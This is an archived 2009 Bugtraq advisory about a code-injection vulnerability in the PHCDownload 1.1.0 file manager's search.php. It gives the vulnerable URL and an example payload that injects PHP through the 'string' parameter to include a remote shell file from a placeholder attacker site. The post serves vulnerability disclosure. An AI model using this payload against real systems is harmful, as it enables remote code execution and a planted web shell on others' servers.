Bugtraq mailing list archives
PHCDownload 1.1.0 Vulnerabilities
From: contact () vnbrain net
Date: 20 Feb 2009 17:10:00 -0000
A file content management and manipulation system unlike any other available on the market today, with unique innovations, tools, and design, customising and producing your database is made easy. PHCDownload has been designed for integration into existing websites with its highly customisable interface and editable language file system. Vendor: http://www.phpcredo.com Version: 1.1.0 and older Vuls file: seach.php Descripton: It is like remote file inclusion but you can run PHP code browser address. I don't know what is called. Exploit: http://[site]/[path_to_script]/search.php Input: ">< <?php PHP code here ?> Example: http://[site]/[path_to_script]/search.php?string=">< <?php include("http://attacker_site/SHELL_FILE"); ?>
Current thread:
- PHCDownload 1.1.0 Vulnerabilities contact (Feb 20)